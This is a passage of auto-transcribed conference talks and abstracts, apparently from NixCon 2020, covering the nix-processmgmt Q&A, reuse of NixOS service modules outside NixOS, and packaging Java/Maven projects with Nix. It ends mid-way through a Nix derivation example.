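    pkg = constructors.nginxReverseProxy {
      webapps = [ webapp1 webapp2 ];
      inherit port;
    };
  };
}
```

Switching the deployment from one process manager to another is then just a matter of invoking the framework's deployment command for a different backend (e.g. a sysvinit-specific versus a systemd-specific switch tool) against the same processes.nix.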
And the nice thing is that you can then deploy processes to networks of machines, and you can also combine them with things that aren't processes. So for example, Apache Tomcat can be managed as a process, but you can also deploy Java web applications to that running Tomcat instance. So this is very nice for deploying very heterogeneous systems. Okay, thank you, Sander. Is that the end of your presentation? Yeah, it's pretty much done. So yeah, there's some future work, and if you want to play around, use this link. And yeah, that's pretty much it. Okay. So we have about, I think, five questions. I will start with the first one. This one is from NICU on IRC, and they said: do you think that NixOS, nix-darwin, and other projects managing services around Nix packages could in the near future move to such an abstraction layer and share more service definitions, et cetera? I think that is very well possible. But the biggest problem we have to overcome, and this is related to Eelco's discussion from yesterday, is that the module system, for example, is somewhat problematic if you want to support features like being able to construct multiple instances of processes, because modules are basically not units of instantiation. So that is a problem. There are actually concepts that you can integrate: for example, the translation process from a high-level specification to any process manager is actually also something you could integrate into the module system. Basically, the concepts are, I think, very generic. So what we could also, in theory, do in Nixpkgs is this: we have a systemd layer, and perhaps a launchd layer, and we also implement a module that resides somewhere in the middle of the translation process, a generic process management layer. And if we use that, then we can already, with the same specifications, support multiple process managers. Of course, another small thing we need to do is to be able to use this service layer separately.
But I think that is something we can easily overcome. Awesome. All this is actually really interesting to me; I was super surprised by your presentation. Yeah. The next question we have is: how do you envision generalizing some systemd-specific features, like hardening or socket activation, that some services use? Yeah, that's a good question. Socket activation, for example, is a concept that launchd also supports, but the sad thing is that they don't follow the same protocol. I don't think it's impossible to generalize that, but I think it's very difficult. So what you can, of course, still do is define overrides for the process managers that you want. Basically, if some service needs socket activation, then you can declare: for launchd, do this, and for systemd, do something else. So sadly, you can't use a generalized concept, but it's still possible to address these deficiencies with overrides if you want to. Great, great. And I think we have one more question, a pretty short one, I think. So: by running processes as a different user and group, do you mean running a service as a proper system service, so not a user service anymore? Yeah, that's exactly what I mean. Okay. So I'm not sure you'll have time to completely finish, but we'll give you a minute. What about a static process manager, e.g., doing a topological sort at Nix build time to output a certain derivation representing the processes which will run at runtime? I'm not sure I completely understood the concept of a static process manager, but that is actually already possible if you combine this framework with Disnix as a process management backend. It uses the Nix language to generate a dependency tree, and the only thing Disnix does is invoke a module that simply starts the process. So that is already somewhat possible.
But yeah, the framework is not really designed to statically generate the dependency trees itself; it only tries to utilize the features of the process manager backends as well as it possibly can. Okay, great. Thank you so much. We are now out of time for the Q&A portion. There's some really interesting sort of crossover between the talks happening here, I think, which is pretty cool. So yeah, thanks. And everyone, please remember to put those clapping emojis in the IRC chat and show the love. Yeah, and the breakout room for this talk, since there seems to be a pretty lively Q&A going on here, is nix-process-mgmt, with management abbreviated MGMT, like an acronym. Yeah. Yep. Okay, everyone, we'll be right back in about five minutes.
Nix is a package manager that offers all kinds of powerful features to make package deployments reliable and reproducible. Although Nix can be used to conveniently deploy packages on various operating systems (such as Linux and macOS), and even allows unprivileged users to deploy packages, deploying services (such as PostgreSQL and Apache HTTPD) still has its limitations. Currently, Nix-based service deployment is solved by a small number of solutions: NixOS requires you to adopt a fully Nixified Linux system and uses systemd as a process manager; nix-darwin only works on macOS with launchd as a process manager. If you are using Nix on a conventional Linux distribution, a different operating system (e.g. FreeBSD), with a different process manager (e.g. supervisord), or as an unprivileged user, then there is no off-the-shelf solution that can help you (yet) to conveniently deploy Nix-provided services. The nix-processmgmt framework (https://github.com/svanderburg/nix-processmgmt) is a prototype that tries to provide universal Nix-based service deployment on all systems where Nix can be used. It offers the following features: * It uses simple conventions for describing process instances, e.g. function definitions and function invocations * It works with high-level deployment specifications that can universally target the following process managers: sysvinit, bsdrc, systemd, supervisord, cygrunsrv and launchd * Tested on the following operating systems: Linux, macOS, Cygwin and FreeBSD * Automatically derives the activation order from process dependencies * Allows you to deploy multiple instances of the same service * Unprivileged user deployments In this talk, I will provide background information about this framework, describe how it works, and show a number of real-life usage scenarios using commonly used services (PostgreSQL, Apache HTTPD etc.) in a number of interesting usage scenarios (unprivileged user deployments, deployment on FreeBSD etc.)
(Although the tool advertises itself as a prototype, it is already quite usable)
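The "function definitions and function invocations" convention from the feature list above might look roughly like this. This is a hedged sketch only: the file names and parameter names are invented for illustration and are not the framework's actual API.

```nix
# processes.nix -- hypothetical sketch of the convention: every service is
# a function definition, and every process instance is a function invocation.
# File and parameter names are illustrative, not nix-processmgmt's real API.
{ pkgs, stateDir }:

rec {
  # one PostgreSQL instance, configured by plain function arguments
  postgresql = import ./postgresql.nix {
    inherit pkgs stateDir;
    port = 5432;
  };

  # a web application that declares a dependency on it, which is what lets
  # a framework derive the activation order automatically
  webapp = import ./webapp.nix {
    inherit pkgs;
    port = 8080;
    dependencies = [ postgresql ];
  };
}
```

Because instances are just function invocations, deploying a second PostgreSQL instance is another invocation with a different port and state directory.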
10.5446/50709 (DOI)
concludes our introduction, and we'll be moving into our first talk, which is "Bridging the Stepping Stones: using pieces of NixOS without full commitment". Our speaker for this talk is going to be Michael Raskin, and an interesting thing about Michael is you may have a hard time finding his GitHub account, because it is just a random hex dump of bytes; I believe it's like 7c6f434c, and yeah, I always have a really hard time trying to figure out, okay, what is his GitHub again. Okay, a little background about Michael is that he's one of the few people who stopped using mainline NixOS but actually still uses Nix and Nixpkgs, and has for more than 10 years, I believe. He moved to NixOS from Linux From Scratch, and he was actually using a separate unionfs slice for each package in that distribution. He's a postdoc in computer science, I believe in theoretical and applied computer science, and he started using NixOS in 2007. Okay, I believe Michael can take it away.

Hello, I'm Michael Raskin, and I will tell you about bridging the stepping stones, or how to use pieces of NixOS without full commitment to the full NixOS and without leaps of faith. So, what pieces of the ecosystem are you expected to use? Well, first, the Nix package manager: yes, you should use it, and it lives well side by side with anything, so the only cost is maybe doubling the space you need for installing software. Next, the Nixpkgs package collection: you most likely want to use it, and what's the cost? Maybe a few gigabytes of clones lying around, and standard environment builds, which you could do in a slightly more space-efficient way, I guess. And then there is the NixOS operating system distribution. Well, maybe you also want to use that. After all, what's the cost? Only changing all of your habits about how to manage an operating system installation.
Of course NixOS has a lot of nice features, and many of them are listed on the home page, but basically it boils down to three bullet points. Your system is a Nix package, and you happen to have Nix around, too. If you boot up to stage 2, you are very likely to boot successfully and into a consistent state. And you have a declarative config, which is just a single expression which gets instantiated from zero to complete and can be versioned and whatever. These are really cool features, so now you might be asking yourself: can you now finally safely experiment with all the cool stuff, like init systems, operating system kernels, and services, which you can override to your liking? And can you finally escape all these complicated interactions between the things that get installed imperatively? Unfortunately, the situation is a bit more complicated. Well, first of all, NixOS hardcodes quite a few things. First of all, it is written around a Linux kernel and systemd as the init system. And then the configuration of NixOS, this declarative thing, is done by a module system, which is nice for simple things and propagates your preferences across the configuration correctly. But when you do complicated things, you notice that there are a lot of moving parts, and there is a global namespace, and they sometimes touch the same place in the namespace. Of course this gets resolved automatically, but the interaction complexity is back here. And also, when you want to play with overriding services, it turns out that modules are less overridable than Nixpkgs packages. And of course NixOS hardcodes how you describe the core of your system; like, you have to use this NixOS-specific DSL to describe which file systems to mount on boot. On the one hand, it looks like not a lot of hardcoding, because what distribution doesn't hardcode such things?
On the other hand, it turns out that inside all of this are trapped some less opinionated things, like configuration generators for multiple daemons, and also start-flag knowledge for these daemons. And as an illustration that there indeed is less opinionated code that is kind of trapped inside: this knowledge is duplicated in nix-darwin, even though for a different service management system, and in Home Manager, which sometimes has a duplication of functionality with NixOS with slightly different approaches in a confusing way, and of course in nix-processmgmt, which you will hear about later today. Of course, one can also ask: is this code really trapped? I invoke the law of headlines ending in a question mark to hint at the answer. Well, it is complicated. There is a strategy for how to use all this code outside a mainline NixOS installation. You just evaluate NixOS as a function, as a Nix expression, with a configuration which is minimal beyond minimal. It is not enough to build a bootable NixOS, or maybe even a container; it only talks about the service itself. And then you grab the parts you care about, most likely the configuration files in /etc. And a nice part of the NixOS systemd unit generation functionality is the possibility to export the contents of the ExecStart stuff, or a runnable script. Thanks for that, it's really useful in many cases. By the way, I use both things I have described here on my own system, to get CUPS running and to get the Xorg configuration. So currently, all of this functionality I use is online, which allows you to grab a service script by service name and NixOS configuration, and also an /etc file, or a bunch of files in /etc. And all of this is online and has been online for some time. So, what are the implications and limitations of these approaches?
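The extraction strategy just described, evaluating NixOS as a function with a beyond-minimal configuration and grabbing only the generated artifacts, can be sketched roughly like this. The attribute paths shown are assumptions for illustration and may differ between nixpkgs versions.

```nix
# Hedged sketch: evaluate NixOS as a plain Nix function with a minimal
# configuration, then grab only the generated pieces you care about.
# Attribute paths are illustrative and may vary across nixpkgs versions.
let
  eval = import <nixpkgs/nixos> {
    configuration = {
      services.printing.enable = true;  # the one service we want
      boot.isContainer = true;          # keeps evaluation from demanding full bootable-system options
    };
  };
in {
  # a configuration file destined for /etc
  cupsdConf = eval.config.environment.etc."cups/cupsd.conf".source;
  # the generated systemd unit text, from which a runner script can be derived
  cupsUnit = eval.config.systemd.units."cups.service".text;
}
```

The point is that nothing here requires booting NixOS: the module system runs during evaluation, and the outputs are ordinary store paths and strings you can reuse under any init system.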
I claim that the main value of NixOS, which would take the most time to replicate even based on Nix, is a large database of configuration generators for many, many daemons and programs. And many services are actually already reusable, which is nice, if you know how to do it and you have a use case. Of course, there are some catches you need to pay attention to, because, for example, many services are configured not just under their namespace but all over the place, and also some services are too complicated for a working runner script to be generated automatically by the generic code. You might be able to grab the parts of the unit and slap together the correct runner script on a case-by-case basis. And then, of course, some services have configs that do not go to /etc and also do not get an option name for the content; they just get referenced inside the service starter unit, and they are annoying to grab. So, you see that I said that I can replace the NixOS boot script, so as not to run the full NixOS but still use the services, but I said something about the module system: what would I use instead? I would use something mimicking Nixpkgs overlays: makeExtensible all the things, define a small core system, and then the core system adapts by reading some parameters from self, like the list of services, which might be empty by default. And in overlays you overwrite whatever you want to reconfigure. And of course, you want to put as much as possible into this attribute set and not into let bindings, because you want everything to be inspectable and maybe even modifiable. On the other hand, I can say that "what if not the module system" is the wrong question. The better question is: can we make it not matter?
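The overlay-style core system described above can be sketched as follows. This is a hedged illustration, assuming an invented service layout; only `lib.makeExtensible` and the `extend` mechanism are the real Nixpkgs machinery.

```nix
# Hedged sketch of an overlay-style "core system" instead of the module
# system: everything lives in one extensible attribute set (not in let
# bindings), so it stays inspectable and overridable. The service record
# shape ({ name, start }) is invented for illustration.
with import <nixpkgs> {};

let
  core = lib.makeExtensible (self: {
    services = [ ];   # empty by default; the core reads this from self
    bootScript = writeScript "boot" ''
      #!${runtimeShell}
      ${lib.concatMapStrings (s: "${s.start} &\n") self.services}
    '';
  });

  # the "overlay": override whatever you want to reconfigure
  mySystem = core.extend (self: super: {
    services = super.services ++ [
      { name = "sshd"; start = "${openssh}/bin/sshd"; }
    ];
  });
in mySystem.bootScript
```

Because `bootScript` is defined in terms of `self`, any later `extend` that changes `services` automatically changes the generated boot script, which is the same fixed-point trick Nixpkgs overlays use.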
The idea is that services could be like packages. They could be packages with parameters, they could provide rich passthrough, and they could request and inspect other service instances. And then it's the user's choice how to ensure that everything gets passed, and that every service gets, as a parameter, a correctly configured instance of its dependencies. And of course the module system would be the default, maybe the only thing supported by mainline NixOS, but it would be easier to extract it and replace it, and it would be a well-defined top-level layer with clean separation of responsibilities. Another thing that NixOS kind of hardcodes is the bootloader handling, because of course NixOS assumes that it's the only thing that could want to configure a bootloader based on system generations managed by Nix, and naturally it assumes that the layout is the NixOS layout. This leads to some unfortunate things, some unmodularity, like that the single Perl script generating the GRUB entries must know how NixOS handles Xen, and stuff like that. And all of this means that if you have a different system which creates system generations, it probably won't be compatible with NixOS unless it takes everything that NixOS does exactly. And that's why I'm actually too lazy to dual-boot with NixOS, because I would need to integrate the two lines of bootloader generation. So if I dream, what would I dream about? I would like to see NixOS services as a Nixpkgs-like package collection, with services configured by argument passing and argument overrides and maybe overlays. I would love to see the module system then on top of that, as one of the ways to connect things, even if the main one. And then I would love to see multiple independent options for the core, like for boot scripts and such, arise while still sharing the service database in an efficient way. And then, to make dual-booting such options more convenient between each other, maybe the NixOS bootloader generator would
collect bootloader configuration snippets from each system generation. Of course, that means that you need to provide snippets at once for all the bootloaders you theoretically support, and probably you would want to fail, unless a special force flag is passed, if the booted system does not support the loader you are trying to configure for the new system. But still, it could be a step forward. And if I'm dreaming anyway, I would like NixOS to gain support for atomic /etc switching. It's not completely infeasible; I do use it on my system, which is kind of similar to NixOS, and it's a symlink into the store, so one symlink change and that's it. I promised to talk a bit about why I even bothered replacing the NixOS boot script. Well, first of all, I like that my virtual terminals are not owned by systemd, which makes it easier to do my custom tricks around launching Xorg, and also it makes it easier to write stuff like: the poweroff command is privileged not by password but by a check of physical presence. Sorry, no screencast, because it's very annoying to use Xorg screencasting software with a lot of virtual terminal switches, you know. And then, my system is managed by custom code, mainly, and for example it integrates automatic nsjail wrappers, so everything I want can be run in a jail, because, I don't know, nobody runs browsers outside containers in 2020, right? And of course, only handpicked things have sound access, which means that my user doesn't actually have sound access, only the things that are run in jails which are specifically granted sound. And then, my own boot mounts are a mess, which is for me easier to manage as a straightforward shell script than inside the NixOS DSL, maybe contrary to its assumptions. And then, just for fun and ease of debugging, I have full versions of everything I have in the initramfs included there. So LVM2 means full LVM2, yes, with full glibc dependency; yes, it takes space, but it only takes space in memory until I
actually switch to the main system, so who cares. And I like to have my services started via explicitly specified, nicely traceable scripts, so if something goes wrong, it's easier to debug. And what can you take out of this, if you want commitment neither to the NixOS approach nor to my approach? Well, you can take the wrappers for piece extraction out of NixOS, as I mentioned. And then, a wrapper to create an isolated D-Bus session inside a container, for something that wants a D-Bus session but doesn't deserve access to your main one, if you even have a main D-Bus session, because I don't. Maybe you might be interested in a Firefox empty-profile builder, based on launching Firefox once in Xdummy. And then there is some code for converting TrueType fonts to bitmap format for the Linux console, because monospace fonts often come with very good hinting, and FontForge is pretty good at converting fonts between formats. Thanks for your attention. Are there questions?

Okay, hello everyone, that was Michael Raskin, "Bridging the Stepping Stones: using pieces of NixOS without full commitment", and I did get news from the channel that we did start a bit earlier than expected. I think it was supposed to start at 7:15, so I am sorry about that. That may make it such that we don't have a lot of questions in the Q&A portion. Let me look into the pad and see if we have any questions, Michael. Yeah, I do not actually see any questions. I will also manually check the channel, nixcon Q&A; if anyone has a question, you can ask there. Yeah, I do not see a question. Yeah, I am sorry about that, Michael. Yeah, happens, whatever. On the other hand, maybe it means that the talk was clear enough. Yeah, that is also a possibility. So I would direct you to the breakout room, which is bridging-steps, and I'm sure that if people watch your talk later, or go back into the broadcast, they can see that, and they can ask you questions from there. I think, Puck says that two questions appeared
just now. I will just read them from the chat, Michael. So we have one from SRHB, and she said: is abstracting the service generation worth it in NixOS proper, maybe? Michael, I believe you're muted. I'm sorry, let me look for the word "proper"... worth it in NixOS proper, maybe. Well, I mean, I don't know exactly how much you want to say that NixOS is the default set of options. I believe, well, I believe it's valuable to have a service database that we can reuse and that we can work on collectively, regardless of our specific choices. I don't know, maybe what subset of the options should be called NixOS proper, and what subset of options should be called "using the services from the NixOS database on a different system"; I think that can be discussed once we have that, once we have things to compare. I'm not sure. Well, it's okay if NixOS is an opinionated set of choices in that regard. It's just a question of what we want to allow next to NixOS, and then we can decide what to reintegrate. Okay, that was pretty clear to me, actually. So you have a question from Nixer86, and they say: it was not obvious from the talk, or I missed it, but do you still use systemd? Well, it turns out that I ended up not using systemd at all. And I'm not against using Nix's systemd in some container or something, but I just never needed it enough. I definitely don't want to have systemd own anything in my top-level namespace, and yeah, well, as I don't run it in smaller namespaces and I don't want it at the top level, I ended up without using systemd at all. Well, of course I have everything linked against systemd libraries, but that's another story. Okay, we have another question, from hyperfekt. Oh, I know you, hey. How does the usability of the module system and your extensibility mechanism compare in practice?
Well, in a sense, it's hard to say, because for my needs this extensibility via overlays has better transparency and easier debuggability, but that's for my specific use case. In a sense, I never tried to use the module system to have multiple people build vastly different configurations, and I cannot exclude that for many people it is a very good choice to use the module system, because it propagates your preferences across the system, well, at least as long as you stay inside its expectations. So, I don't know, I didn't try to see for whom. I believe that there are situations where, for some people and for some settings, different approaches are more usable, more debuggable, more inspectable than the module system. And as I said, I am not sure; it might be that it's still the best choice for the mainline, most popular version of NixOS. Okay, we have a question from ryantm. He says: it sounds like you're suggesting to move modules to packages, which is maybe the opposite of Eelco's proposal yesterday; what do you think? Haha, well, I think the following. Well, first of all, excuse me for not addressing any of Eelco's points at all, kind of sorry, but worldofpeace can confirm that my recording had been finished before I had any chance to see Eelco's talk yesterday. And on the other hand, yeah, I think the following. I do believe that, well, when I looked yesterday, for example, at the slides of Eelco's talk, I was a bit worried when you say, okay, you can overwrite the configs of the module you extend, and then I saw the config overwrite, and it was just a global overwrite, and so, you know, it's complicated. So I thought, okay, so what are the scoping rules? I think that for putting modules inside Nix, things like scoping rules matter, so as not to stop being, you know, a purely functional programming language, which gives you at least an option to have full referential transparency, not only formally but also really, and to avoid global namespaces, if you want to avoid the global namespaces, and so on. I think
Nix being a purely functional programming language was very valuable from the very beginning and is still valuable now. And so, yeah, as I said, I believe that the module system is a good thing at some levels, but I believe there are layers that are better done as pure functions and fully extendable, fully inspectable plain data structures. Okay, I'm looking at the pad again for more questions. I do not see any. I think we did have one more: what's your init? Well, as for my init system, it turns out that if you have a small enough desktop system, and you actually want to see and control what is there and how it runs, and you have just a few things, and you immediately observe whether they are working or not, and you restart them for unrelated reasons anyway (like, I restart my local BIND when I change the network I'm connected to, or just so that it reconfigures itself a bit), it turns out that in this situation you don't even really need an init system, in a sense. So I do have a PID 1, obviously, and it is intended as an init system, and it is sinit from suckless. I don't like everything suckless does; well, in the sense that I don't find all the tools suckless produces useful for me. But as an init, I looked at it, and it does exactly what I wanted it to do. So yeah, my init is sinit. And then I have, as I said, this daemon which manages my system; in particular, it launches the few daemons I want to have running on my system. And that's it. And somehow it turns out that on a simple enough system with enough RAM (and I happen to have enough RAM, you know), CUPS doesn't crash on its own, BIND doesn't crash on its own, Xorg doesn't crash on its own, and then what is even there for a true system supervisor to monitor? Okay, great. Whoops, another question: is there something else apart from nsjail that I could check to learn more about your jail setup? It sounds like you're going to prison. Well, I mean, I
assume, I hope, at some point, yeah, I will at some point publish the slides, I guess, and I hope the recording will be there. Well, most of my setup, because of course there are some small things which are very local, like some of the specific host names and stuff, which might not be fully included, but generally, you know, I have most of my setup online in my GitHub account. And yeah, well, you can look at this, but basically, it's just using nsjail, and then there are a lot of things that you need to tell nsjail to comfortably wrap some application. I need to tell nsjail what directories to provide to the application, and which of them to provide read-only or read-write. I also run nsjail under a specific user ID, which is unique for every application during a single session, and stuff like that. And I set the environment variables, of course, because of course you need to set up stuff. But basically, well, it's a piece of code to generate a ton of flags for nsjail, I would say. Okay, great answer, actually. I don't see any more questions in the Q&A portion, so I believe that would lead us into the closing. Thank you so much for being here, Michael. It seems that you got to have basically an extended Q&A portion, because we started early. Yeah, thank you. Yep, nice having you.
The talk explains use of NixOS code as a library instead of a framework: the present, the possible even better future, and some of the payoff. The Nix package manager has a lot of useful properties, and NixOS makes it possible to expand the use of such properties beyond just installing packages. However, while Nixpkgs behaves mostly like a library, with overrides sometimes used to change even the fundamental assumptions if these are not used by some packages (see, e.g., pkgsMusl), NixOS is typically perceived as closer to a framework. Using NixOS service management means committing to the module system (but Nixpkgs overrides are still useful), nonatomic /etc switching, systemd, NixOS driver management, etc. This creates a leap of faith, as installing Nix side-by-side breaks only storage quotas, but installing NixOS breaks everything; and it leads to some duplication with nix-darwin and similar projects. In the talk I will tell what and how to reuse from NixOS now, what NixOS changes could simplify use of NixOS as a shared knowledge collection about running services between different projects with different commitment levels, and how a bit of commitment to dumping the core assumptions turns some features from a weird dream into table stakes.
10.5446/50710 (DOI)
Okay, sorry, I kind of got kicked from this room. So we have our final talk of the conference today. Well, we have another day tomorrow, but yes. Our final talk is "Nix in the Java ecosystem" by Farid Zakaria; I hope I'm saying his last name properly. Java is one of the most popular languages; however, there is a fragmented and incomplete solution when it comes to tooling available in Nixpkgs. This talk is going to go over the current state of affairs, so you know what's available today, and what is so difficult about Java compared to other supported languages inside Nixpkgs. And there's also going to be a proposed solution aimed at filling this gap. And some information about Farid: he's deeply passionate about reproducibility, developer tooling and ergonomics. His prior experience has largely been centered around building public cloud infrastructure for AWS and Oracle. He has over a decade of experience writing software and is currently employed by Google. And I guess you could say that outside of being a software engineer, he is a father and a wishful amateur surfer. Okay, take it away, Farid.

Can you guys hear me? Oh, I'm live. Oh, thanks. So thanks everyone for attending. I can hear you. I'm presenting from OBS, so I'm going to just continue. I think I'm live. Okay, I'm going to start. Oh. Sorry, I muted this thing. I was just presenting my audio over OBS. I'm going to start. Great. Thanks everyone for attending my talk. Just to recap, my talk is going to be geared at Nix, and specifically the Java ecosystem, and I'm going to center it on Maven. The subtext for this talk is making Nix enterprise friendly. The sub-subtext: maybe, where are all my Java peeps? And I'm going to show some slides with some code samples; I just want to, I guess, apologize ahead of time for that. So I had a nice little introduction already, so we'll probably go really quickly through this slide. I'm Farid.
It's Zakaria. That's okay, no worries. Currently working at Google. Again, about a decade of experience, probably nine of those ten years on Java. Relative newcomer to Nix. I heard a great quote on the Discord channel, "endless beginner", that I thought was quite apt, unfortunately. And the range of build support for the Java code bases at the companies I've worked at has ranged from off-the-shelf Maven and Gradle to highly custom, proprietary build tools. And, you know, so I'm a pretty happy acolyte at the moment with Nix. It's a Pandora's box I've opened, and yeah. So the goals outlined in this talk are: I'm going to describe why we should improve Java support; how other languages currently offer support in Nix, the main pattern or strategy; and what's challenging about that in the Java ecosystem. And, you know, hopefully a goal of this talk is to empower you to use Nix for Java at your place of work, and to solicit more improvements and ideas. So, maybe get people who are using Nix and Java out of the woodwork, and let's collaborate some more. So why am I singling out Java specifically for enterprise? Well, Java, to date, I mean, it's a very popular programming language. Here's a snapshot of the top 10 languages by popularity of their Google searches. So Java, you know, as of 2020, is second, but up until recently it was number one for quite a while. And my subjective experience, however, is that Java remains one of the highest in-demand languages for non-Windows-based enterprise shops. You know, building web services is Java's bread and butter, and so I think there's a lot of opportunity there to build upon. So I'm making the claim: enterprise loves Java; you know, specifically non-Microsoft shops, because they have .NET, which is C#, kind of very similar. And in fact, Java's enterprise notoriety has made itself memeable with its overuse of design patterns. So this graphic here is just a little excerpt, and it's really funny, I put the link.
It always, I don't know, gives me a chuckle. It's a really fun implementation of the FizzBuzz interview question. So if you're not familiar with FizzBuzz, the question says: just iterate from 1 to 15, and if it's divisible by three, output "fizz", and if it's divisible by five, output "buzz". And in classic Java fashion, it's overlaid with strategies and factories and patterns, you know, so, yeah. And at the top there is also a really fun class name that you get in Java a lot because of the overuse of patterns and strategies; it's like factories of factories that are instances that are beans. So, many languages nowadays have an accompanying tool to help manage and resolve dependencies: pip, cargo, bundler, maven, cabal, npm. You know, dependencies are no longer vendored along with the source, and there's an expectation that you have some network connectivity to rehydrate those dependencies. Unfortunately, Nix build sandboxing disables network connections, you know, for good reason, to try to force reproducible builds. So, you know, what can be done here? And maybe, you know, the simplest of Nix derivations shows the way, and that's fixed-output derivations. Is that the solution to this problem? The basic formula that many languages with support in Nix follow is: they take their custom lock format and generate a Nix expression. So this is the Nix language support; one step is here. It takes the lock format file, generates a Nix expression, and then there's accompanying Nix support to take that Nix expression and use fetchurl to download all those dependencies and bundle them all together into a single Nix store entry with linkFarm. And ta-da, we have our vendor directory back. You know, this works because that Nix expression contains the SHA, so fetchurl is allowed to proceed in the sandboxed environment. Okay, so I'll go pretty slow here. Yeah, again, sorry, I know it's like a bummer to see code and text in slides.
So, just to put it in perspective, here's the contents of a popular Nix tool for Ruby; it's called Bundix. So on the left is my Gemfile.lock; that's your lock file that pins the transitive closure of your dependencies to specific versions. Bundix takes that and, on the right, generates a Nix expression, though really anything native to Nix would work fine; many tools use JSON. You can see here it tells you where to download each dependency from, as well as the SHA, which is important for the fixed-output derivation. What's not shown here is the call to generate the final Nix store entry, but I've included it here, and you can see it's a linkFarm of all those downloaded dependencies. And with that, you can now pass it to your language of choice, in this case Ruby, and you have your vendor directory, essentially, with all your dependencies. You know, what's really nice about this pattern is it's pretty granular. Because we're using Nix's linkFarm, all the dependencies have unique Nix store entries, pinned to a particular version, so they're reusable. But it's somewhat pragmatic, because it's a flattened tree; you're not getting the full transitive graph, which would be kind of neat, so that you could use nix-store queries to see even your language's dependency tree in the Nix store. But I think this is a good middle ground. Okay, so enter Maven. Maven was released in 2004. So, I think Nix is 20 years old, so not quite as old as Nix, but pretty old still, 16 years. It predates many, you know, newer languages and package managers, and it still has a huge market share. I'd say Java is predominantly split between Gradle and Maven; I'm not really sure which one's the dominant one; subjectively, for me, it's been Maven. It does things differently than what you might have come to expect from more recent package managers, and I think the most important difference is that it does not generate a lock file, which is interesting.
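The Bundix-style pattern described above (lock file in, fetchurl plus linkFarm out) can be sketched roughly like this. The gem listed is illustrative, and the hash is a placeholder that the generator tool would normally fill in with the real value.

```nix
# Hedged sketch of the lock-file-to-Nix pattern: a generator tool emits
# name/url/sha256 triples, and Nix turns them into a vendor directory.
{ pkgs ? import <nixpkgs> {} }:

let
  # in practice this list is generated from the lock file by a tool
  deps = [
    {
      name = "rake-13.0.1.gem";
      url = "https://rubygems.org/gems/rake-13.0.1.gem";
      sha256 = pkgs.lib.fakeSha256;  # placeholder; the real SHA comes from the generator
    }
  ];
in
# one symlink per dependency, each backed by its own store entry
pkgs.linkFarm "vendored-deps" (map (d: {
  inherit (d) name;
  path = pkgs.fetchurl { inherit (d) url sha256; };
}) deps)
```

Because each `fetchurl` is its own fixed-output derivation, dependencies shared between projects are downloaded once and reused from the store, which is the granularity the talk is pointing at.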
It relies on the fact that the algorithm with which it walks your dependency tree is stable and explicit, so the same versions are always resolved. And it uses a nearest-wins strategy: as it's walking your graph, if you have a diamond dependency problem, so two different dependencies depend on the same library but at different versions, then under the nearest-wins strategy, whichever one it hits first is the one you're going to resolve to. That's, I guess, kind of interesting, because then it doesn't have to do any SAT solving to find correct versions that work within ranges. The problem, though, is that adding dependencies, or even bumping or changing anything in your transitive closure, can really change the graph and have reverberating changes to the dependency versions. And then there's the fact that Maven is closer to Make than to some of the other package management tools, because it's really generic, and you can plug in various plugins to augment your build lifecycle in any sort of way. It's in XML, so it's quite verbose and kind of challenging to work with as well. So, what are the challenges I see with incorporating Maven into Nix today? Well, for one, it has some external APIs to investigate the dependency closure, and this would be useful for writing a tool that generates the Nix expression or JSON, but it's somewhat restricted and actually pretty incomplete. It has a rich ability to generate plugins for itself and offers substantial flexibility there; however, the external tooling is lacking. The current API they offer lets you introspect compile or runtime dependencies, but it excludes all those build-time dependencies that are useful for plugins, which you still need in order to run Maven in a network-isolated environment. And like I said, it's a pretty generic system.
So really trying to capture a good one-size-fits-all solution is challenging, especially since it's used a lot in the enterprise world; they're more likely to have some bespoke use cases where they're really doing interesting patterns. I mean, I think that's also why it's so popular in enterprise, because it can really do anything. Finally, there are some anti-patterns that are really popular in Java that are kind of the antithesis of how Nix wants to do things. So, when you wanted to distribute a jar or your application, it was really popular to build what's called a fat jar or uber jar, for which, I think, a good analogy would be a static binary. You're bundling all your dependencies together in a zip, which is what a jar is. You then can't leverage a lot of the granularity and the cachability of Nix through the store. And finally, there's just not a lot of documentation or examples in Nixpkgs, you know, maybe because a lot of it's closed source, and this is what my talk is geared at: augmenting the documentation, showing how to do it today, and getting people to contribute more openly. So, I want to talk about two patterns for how to package Maven projects with Nix, really quickly. The first is the double-invocation pattern. Actually, it's not really specific to Maven; you could use it with anything, but it's quite useful here. I actually came across this pattern in a GitHub issue, which is somewhat, I guess, typical of how you come across solutions for problems at the moment in Nix: a lot of Googling and reading through GitHub issues. You run your full build, which would be this top part here; this whole derivation is running the first build once. And maven.repo.local is where it's going to be building out the cached dependencies locally, and I'm setting that into my Nix store. There's a little cleanup phase here in the install where I'm just removing things, to help keep the output hash more consistent.
So, things like timestamps and files that Maven wants to generate. And it's a double invocation: you run this once and fix up your output hash. You put a fake output hash to start, and Nix tells you the output hash it expects. The output of this derivation I can then feed into a subsequent Maven build and tell it to work in offline mode, so I can use this Nix store path to rehydrate a subsequent build. Surprisingly, this isn't bad, and it works in practice. However, due to the lack of a real lock file, and the way some people choose to structure their Maven application, using version ranges, or unfortunately SNAPSHOTs, which are a special type of development copy not pinned to an exact version, you can run into the problem that the output hash is not reproducible. So submitting this into something like Nixpkgs may not be optimal, because it might get out of date and become unbuildable pretty quickly. It's also not very granular, since it downloads all the dependencies into a single Nix store entry, so subsequent rebuilds of this derivation essentially have to re-download all your dependencies all over again, and you have these pretty coarse store entries. So here's the second derivation actually using the previous one: I set the repository variable to the previous derivation, and what's important here is that I tell Maven to run in offline mode. And, yeah, we're off to the races there. Now, there is actually some, air quotes here, official built-in Maven language support in Nixpkgs, called buildMaven. It relies on a Maven-to-Nix plugin, which I've included here with a link to its GitHub repo. I put "official" in quotes because what spurred this talk is that there's very little recent activity; the last commit was in 2017.
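Since the slides aren't visible in this transcript, here is a minimal sketch of the double-invocation pattern described above. This is an illustration under assumptions, not the speaker's exact code: the derivation name, the cleanup commands, and the project layout are all made up; only the overall shape (fixed-output derivation caching the Maven repository, then a second offline build) follows the talk.

```nix
# First invocation: run the full Maven build once, keep only the
# downloaded repository, and pin it as a fixed-output derivation.
{ lib, stdenv, maven }:

stdenv.mkDerivation {
  name = "my-app-maven-deps";   # illustrative name
  src = ./.;
  buildInputs = [ maven ];
  buildPhase = ''
    mvn package -Dmaven.repo.local=$out/.m2
  '';
  installPhase = ''
    # Cleanup to keep the output hash consistent: drop files Maven
    # regenerates with timestamps or resolver state.
    find $out/.m2 -name '*.lastUpdated' -delete
    find $out/.m2 -name 'resolver-status.properties' -delete
  '';
  outputHashAlgo = "sha256";
  outputHashMode = "recursive";
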